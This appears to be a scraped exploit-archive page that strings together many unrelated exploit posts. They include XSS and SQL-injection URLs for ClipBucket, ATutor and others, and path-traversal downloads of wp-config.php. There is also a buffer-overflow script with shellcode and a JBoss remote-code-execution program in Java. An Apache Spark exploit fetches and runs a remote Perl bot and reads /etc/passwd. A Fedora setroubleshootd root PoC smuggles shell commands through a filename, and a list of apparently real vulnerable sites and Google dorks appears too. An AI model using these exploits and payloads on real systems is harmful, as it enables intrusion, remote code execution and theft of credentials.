HireHackking

source: https://www.securityfocus.com/bid/51321/info ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. ClipBucket 2.6 is vulnerable; other versions may also be affected. http://www.example.com/[path]/groups.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time

source: https://www.securityfocus.com/bid/51321/info ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. ClipBucket 2.6 is vulnerable; other versions may also be affected. http://www.example.com/[path]/search_result.php?query=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&submit=Search&type=

source: https://www.securityfocus.com/bid/51321/info ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. ClipBucket 2.6 is vulnerable; other versions may also be affected. http://www.example.com/[path]/videos.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time

source: https://www.securityfocus.com/bid/51321/info ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. ClipBucket 2.6 is vulnerable; other versions may also be affected. http://www.example.com/[path]/view_item.php?collection=9&item=KWSWG7S983SY&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E

source: https://www.securityfocus.com/bid/51321/info ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. ClipBucket 2.6 is vulnerable; other versions may also be affected. http://www.example.com/[path]/view_collection.php?cid=9&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E

source: https://www.securityfocus.com/bid/51321/info ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. ClipBucket 2.6 is vulnerable; other versions may also be affected. http://www.example.com/[path]/videos.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27

source: https://www.securityfocus.com/bid/51336/info Marinet CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/room2.php?roomid=[SQLi]

source: https://www.securityfocus.com/bid/51336/info Marinet CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/galleryphoto.php?id=[SQLi]

#!/usr/bin/env python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: IDM v6.20 Local Buffer Overflow #[+] Date: 27-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://www.internetdownloadmanager.com/ #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Poc:http://i.imgur.com/7et4xSh.png #[+] Create IDMLBOF.txt then open , copy the content then go to Options-VPN/Dial Up and paste it in the username field. from struct import pack file="IDMLBOF.txt" junk="\x41"*2313 eip = pack('<I',0x7C9D30D7) nops = "\x90" * 3 shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78" "\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3" "\xb4\xae\x7d\x02\xaa\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27\xdd\x48\xfd" "\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8" "\x3b\x83\x8e\x83\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98\xf5" "\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61\xb6\x0e\x2f\x85\x19\x87" "\xb7\x78\x2f\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca") writeFile = open (file, "w") writeFile.write(junk+eip+nops+shellcode) writeFile.close()

source: https://www.securityfocus.com/bid/51321/info ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. ClipBucket 2.6 is vulnerable; other versions may also be affected. http://www.example.com/[path]/channels.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27

source: https://www.securityfocus.com/bid/51336/info Marinet CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/gallery.php?photoid=1&id=[SQLi]

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |-------------------------------------------------------------------------| | [+] Exploit Title:Wordpress aspose-doc-exporter Plugin Arbitrary File Download Vulnerability | | [+] Exploit Author: Ashiyane Digital Security Team | | [+] Vendor Homepage : https://wordpress.org/plugins/aspose-doc-exporter/developers/ | [+] Download Link : https://downloads.wordpress.org/plugin/aspose-doc-exporter.zip | [+] Tested on: Windows,Linux | | [+] Date : 2015-03-28 | [+] Discovered By : ACC3SS |-------------------------------------------------------------------------| | [+] Exploit: | | [+] Vulnerable file : http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php | | [+] Vulnerable Code : <?php $file = $_GET['file']; $file_arr = explode('/',$file); $file_name = $file_arr[count($file_arr) - 1]; header ("Content-type: octet/stream"); header ("Content-disposition: attachment; filename=".$file_name.";"); header("Content-Length: ".filesize($file)); readfile($file); exit; ?> | [+] http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=[File Address] | [+] | [+] Examples : http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php |-------------------------------------------------------------------------| |*||*||*||*||*||*||*||*||*||*||*||*||*

/* * JBoss JMXInvokerServlet Remote Command Execution * JMXInvoker.java v0.3 - Luca Carettoni @_ikki * * This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...). * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation" * serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console" * and the "JMX Console" are protected or disabled. * * [FAQ] * * Q: Is my target vulnerable? * A: If http://<target>:8080/invoker/JMXInvokerServlet exists, it's likely exploitable * * Q: How to fix it? * A: Enable authentication in "jmx-invoker-service.xml" * * Q: Is this exploit version-dependent? * A: Unfortunately, yes. An hash value is used to properly invoke a method. * At least comparing version 4.x and 5.x, these hashes are different. * * Q: How to compile and launch it? * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java * java -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker * Yes, it's a Java exploit. I can already see some of you complaining.... */ import java.io.BufferedReader; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import java.io.ObjectOutputStream; import java.lang.reflect.Array; import java.lang.reflect.Field; import java.lang.reflect.Method; import java.net.ConnectException; import java.net.HttpURLConnection; import java.net.URL; import javax.management.MalformedObjectNameException; import javax.management.ObjectName; import org.jboss.invocation.MarshalledInvocation; //within jboss.jar (look into the original JBoss installation dir) public class JMXInvokerServlet { //---------> CHANGE ME <--------- static final int hash = 647347722; //Weaponized against JBoss 4.0.3SP1 static final String url = "http://127.0.0.1:8080/invoker/JMXInvokerServlet"; static final String cmd = "touch /tmp/exectest"; //------------------------------- public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException { System.out.println("\n--[ JBoss JMXInvokerServlet Remote Command Execution ]"); //Create a malicious Java serialized object MarshalledInvocation payload = new MarshalledInvocation(); payload.setObjectName(new Integer(hash)); //Executes the MBean invoke operation Class<?> c = Class.forName("javax.management.MBeanServerConnection"); Method method = c.getDeclaredMethod("invoke", javax.management.ObjectName.class, java.lang.String.class, java.lang.Object[].class, java.lang.String[].class); payload.setMethod(method); //Define MBean's name, operation and pars Object myObj[] = new Object[4]; //MBean object name myObj[0] = new ObjectName("jboss.deployer:service=BSHDeployer"); //Operation name myObj[1] = new String("createScriptDeployment"); //Actual parameters myObj[2] = new String[]{"Runtime.getRuntime().exec(\"" + cmd + "\");", "Script Name"}; //Operation signature myObj[3] = new String[]{"java.lang.String", "java.lang.String"}; payload.setArguments(myObj); System.out.println("\n--[*] MarshalledInvocation object created"); //For debugging - visualize the raw object //System.out.println(dump(payload)); //Serialize the object try { //Send the payload URL server = new URL(url); HttpURLConnection conn = (HttpURLConnection) server.openConnection(); conn.setRequestMethod("POST"); conn.setDoOutput(true); conn.setDoInput(true); conn.setUseCaches(false); conn.setRequestProperty("Accept", "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"); conn.setRequestProperty("Connection", "keep-alive"); conn.setRequestProperty("User-Agent", "Java/1.6.0_06"); conn.setRequestProperty("Content-Type", "application/octet-stream"); conn.setRequestProperty("Accept-Encoding", "x-gzip,x-deflate,gzip,deflate"); conn.setRequestProperty("ContentType", "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation"); ObjectOutputStream wr = new ObjectOutputStream(conn.getOutputStream()); wr.writeObject(payload); System.out.println("\n--[*] MarshalledInvocation object serialized"); System.out.println("\n--[*] Sending payload..."); wr.flush(); wr.close(); //Get the response InputStream is = conn.getInputStream(); BufferedReader rd = new BufferedReader(new InputStreamReader(is)); String line; StringBuffer response = new StringBuffer(); while ((line = rd.readLine()) != null) { response.append(line); } rd.close(); if (response.indexOf("Script Name") != -1) { System.out.println("\n--[*] \"" + cmd + "\" successfully executed"); } else { System.out.println("\n--[!] An invocation error occured..."); } } catch (ConnectException cex) { System.out.println("\n--[!] A connection error occured..."); } catch (IOException ex) { ex.printStackTrace(); } } /* * Raw dump of generic Java Objects */ static String dump(Object o) { StringBuffer buffer = new StringBuffer(); Class oClass = o.getClass(); if (oClass.isArray()) { buffer.append("["); for (int i = 0; i < Array.getLength(o); i++) { if (i > 0) { buffer.append(",\n"); } Object value = Array.get(o, i); buffer.append(value.getClass().isArray() ? dump(value) : value); } buffer.append("]"); } else { buffer.append("{"); while (oClass != null) { Field[] fields = oClass.getDeclaredFields(); for (int i = 0; i < fields.length; i++) { if (buffer.length() > 1) { buffer.append(",\n"); } fields[i].setAccessible(true); buffer.append(fields[i].getName()); buffer.append("="); try { Object value = fields[i].get(o); if (value != null) { buffer.append(value.getClass().isArray() ? dump(value) : value); } } catch (IllegalAccessException e) { } } oClass = oClass.getSuperclass(); } buffer.append("}"); } return buffer.toString(); } }

source: https://www.securityfocus.com/bid/51422/info BoltWire is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. BoltWire 3.4.16 is vulnerable; other versions may also be affected. http://www.example.com/bolt/field/index.php?p=main&help=&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/bolt/field/index.php?"</a><script>alert(document.cookie)</script></ http://www.example.com/bolt/field/index.php?p=main&action=&#039;"</a><script>alert(document.cookie)</script></&file=file.jpg

# Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability # Exploit Author : Claudio Viviani # Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380 # Software Link : Premium plugin # Dork Google: revslider.php "index of" # Date : 2014-07-24 # Tested on : Windows 7 / Mozilla Firefox Linux / Mozilla Firefox ###################### # Description Wordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability ###################### # PoC http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php ##################### Discovered By : Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww #####################

###################################################################### # Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability # Google Dork: inurl:option=com_gallery_wd # Date: 29.03.2015 # Exploit Author: CrashBandicot (@DosPerl) # Vendor HomePage: http://web-dorado.com/ # Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd # Tested on: Windows ###################################################################### parameter 'theme_id' in GET vulnerable # Example : # Parameter: theme_id (GET) # Type: error-based # GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) # ==================================================================================== # parameter 'image_id' in POST vulnerable # Example : # URI : /index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2 # Parameter: image_id (POST) # Type: error-based # POST Payload: image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search # ~ Demo ~ # $> http://www.cnct.tg/ http://www.nswiop.nsw.edu.au/ http://cnmect.licee.edu.ro/ #EOF

source: https://www.securityfocus.com/bid/51423/info ATutor is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. ATutor 2.0.3 is vulnerable; other versions may also be affected. http://www.example.com/ATutor/themes/default/tile_search/index.tmpl.php/" <script>alert(document.cookie)</script> http://www.example.com/ATutor/login.php/index.php" <script>alert(document.cookie)</script>/index.php http://www.example.com/ATutor/search.php/index.php" <script>alert(document.cookie)</script>/index.php http://www.example.com/ATutor/password_reminder.php" <script>alert(document.cookie)</script>/index.php http://www.example.com/ATutor/login.php/jscripts/infusion/" <script>alert(document.cookie)</script>/index.php http://www.example.com/ATutor/login.php/mods/_standard/flowplayer/" <script>alert(document.cookie)</script>/index.php http://www.example.com/ATutor/browse.php/jscripts/infusion/framework/fss/" <script>alert(document.cookie)</script>/index.php http://www.example.com/ATutor/registration.php/themes/default/ie_styles.css" <script>alert(document.cookie)</script>/index.php http://www.example.com/ATutor/about.php/" <script>alert(document.cookie)</script>/index.php http://www.example.com/ATutor/themes/default/social/basic_profile.tmpl.php/" <script>alert(document.cookie)</script>/index.php

[+]Title: Joomla Contact Form Maker v1.0.1 Component - SQL injection vulnerability [+]Author: TUNISIAN CYBER [+]Date: 29/03/2015 [+]Vendor: http://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/contact-form-maker [+]Type:WebApp [+]Risk:High [+]Overview: Contact Form Maker v1.0.1 suffers, from an SQL injection vulnerability. [+]Proof Of Concept: 127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL

# Exploit Title: Arbitary Code Execution in Apache Spark Cluster # Date: 23/03/2015 # Exploit Author: AkhlD (AkhilDas) <akhld@live.com> CodeBreach.in # Vendor Homepage: https://spark.apache.org/ # Software Link: https://spark.apache.org/downloads.html # Version: All (0.0.x, 1.1.x, 1.2.x, 1.3.x) # Tested on: 1.2.1 # Credits: Mayur Rustagi (@mayur_rustagi), Patrick Wendel (@pwendell) for reviewing. # Reference(s) : http://codebreach.in/blog/2015/03/arbitary-code-execution-in-unsecured-apache-spark-cluster/ # Exploit URL : https://github.com/akhld/spark-exploit/ # Spark clusters which are not secured with proper firewall can be taken over easily (Since it does not have # any authentication mechanism), this exploit simply runs arbitarty codes over the cluster. # All you have to do is, find a vulnerable Spark cluster (usually runs on port 7077) add that host to your # hosts list so that your system will recognize it (here its spark-b-akhil-master pointing # to 54.155.61.87 in my /etc/hosts) and submit your Spark Job with arbitary codes that you want to execute. # Language: Scala import org.apache.spark.{SparkContext, SparkConf} /** * Created by akhld on 23/3/15. */ object Exploit { def main(arg: Array[String]) { val sconf = new SparkConf() .setMaster("spark://spark-b-akhil-master:7077") // Set this to the vulnerable host URI .setAppName("Exploit") .set("spark.cores.max", "2") .set("spark.executor.memory", "2g") .set("spark.driver.host","hacked.work") // Set this to your host from where you launch the attack val sc = new SparkContext(sconf) sc.addJar("target/scala-2.10/spark-exploit_2.10-1.0.jar") val exploit = sc.parallelize(1 to 1).map(x=>{ //Replace these with whatever you want to get executed val x = "wget https://mallicioushost/mal.pl -O bot.pl".! val y = "perl bot.pl".! scala.io.Source.fromFile("/etc/passwd").mkString }) exploit.collect().foreach(println) } } Thanks Best Regards

setroubleshoot tries to find out which rpm a particular file belongs to when it finds SELinux access violation reports. The idea is probably to have convenient reports for the admin which type enforcement rules have to be relaxed. setroubleshoot runs as root (although in its own domain). In util.py we have: 266 def get_rpm_nvr_by_file_path_temporary(name): 267 if name is None or not os.path.exists(name): 268 return None 269 270 nvr = None 271 try: 272 import commands 273 rc, output = commands.getstatusoutput("rpm -qf '%s'" % name) 274 if rc == 0: 275 nvr = output 276 except: 277 syslog.syslog(syslog.LOG_ERR, "failed to retrieve rpm info for %s" % name) 278 return nvr (and other similar occurences) So. Yes, thats correct: The SELinux system that is only there to protect you, passes attacker controlled data to sh -c (https://docs.python.org/2/library/commands.html) inside a daemon running as root. Sacken lassen... I attached a PoC which uses networkmanager's openvpn plugin to execute arbitraty commands by triggering an access violation to a pathname which contains shell commands. The setroubleshootd_t domain has quite a lot of allowed rules and transitions, so this can clearly count as privilege escalation. Furthermore a lot of admins run their system in permissive mode (full root) even when its shipped enforcing by default. Also note that there are potentially remote vectors, if attackers can control part of the filenames being created (web uploads, git, scp, ftp etc). Sebastian PS: I am all for SELinux but theres something on the wrong way. I counted the LOC, and the core SELinux (kernel) has a smaller codebase than whats framed around in python, running as root and mangling attacker controlled input. IOW, the system that wants to protect you has fewer code enforcing the rules than code that potentially blows up your system. And that code is python, so let alone all the python modules and interpreter hat can have bugs on its own. Driving such a lane _can only lead to abyss_. And I am not saying that evil powers are creating an overly complex system to better hide their bugdoors within. PPS: bug-logo will follow :) -- ~ perl self.pl ~ $_='print"\$_=\47$_\47;eval"';eval ~ krahmer () suse de - SuSE Security Team #!/usr/bin/perl # # Fedora21 setroubleshootd local root PoC # # (C) 2015 Sebastian Krahmer # # - requires polkit authorization to add/mod VPN connections # to NetworkManager (default on desktop user) # - after execution of this script, which adds appropriate # NM connection entries, try # # $ nmcli c up vpn-FOOBAR # # a couple of times, until you see: # # logger[4062]: uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:setroubleshootd_t:... # # in the journalctl logs # # PS: I know in advance what the SELinux developers will say... :p # # I say: lulz! # create a pathname that setroubleshootd will eventually # query sh -c { rpm -qf ... with, fucking up ' escaping. So the # embedded pathname is then evaluated as command # # There goes your NSA-grade SELinux security!!! $file = "/tmp/foo.pem';`id|logger`;echo '"; open(O, ">", $file) or die $!; close O; # add connection system("nmcli c add type vpn ifname FOOBAR vpn-type openvpn"); open(O,"|nmcli c edit vpn-FOOBAR") or die $!; print O "set vpn.data ca = /tmp/foo.pem';`id|logger`;echo ', password-flags = 1, connection-type = password, remote = 1.2.3.4, username = FOOBAR\n"; print O "set vpn.secrets password=1\nsave\nquit\n"; close(O); print "Now do 'nmcli c up vpn-FOOBAR' and watch logs.\n";

source: https://www.securityfocus.com/bid/51424/info Beehive Forum 101 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. http://www.example.com/forum/register.php?'[xss] http://www.example.com/forum/register.php/''[xss] http://www.example.com/forum/logon.php?'"'[xss] http://www.example.com/forum/logon.php/'"'[xss]

source: https://www.securityfocus.com/bid/51428/info phpVideoPro is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. phpVideoPro 0.9.7 is vulnerable; prior versions may also be affected. http://www.example.com/phpvideopro-0.9.7/help/index.php?topic=&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/phpvideopro-0.9.7/login/"><script>alert(document.cookie)</script><" http://www.example.com/phpvideopro-0.9.7/configure.php/"><script>alert(document.cookie)</script><" http://www.example.com/phpvideopro-0.9.7/medialist.php/"><script>alert(document.cookie)</script><" http://www.example.com/phpvideopro-0.9.7/setfilter.php/"><script>alert(document.cookie)</script><" http://www.example.com/phpvideopro-0.9.7/search.php/"><script>alert(document.cookie)</script><" http://www.example.com/phpvideopro-0.9.7/listgen.php/"><script>alert(document.cookie)</script><" http://www.example.com/phpvideopro-0.9.7/label.php/"><script>alert(document.cookie)</script><"

source: https://www.securityfocus.com/bid/51431/info Giveaway Manager is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Giveaway Manager 3 is vulnerable; other versions may also be affected. http://www.example.com/members.php?id=[XSS]

source: https://www.securityfocus.com/bid/51434/info Annuaire PHP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/[path]/referencement/sites_inscription.php?nom=xss&url=[xss]

source: https://www.securityfocus.com/bid/51444/info Rockwell Automation FactoryTalk Activation Server is prone to multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to crash the affected application, denying service to legitimate users. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36570.zip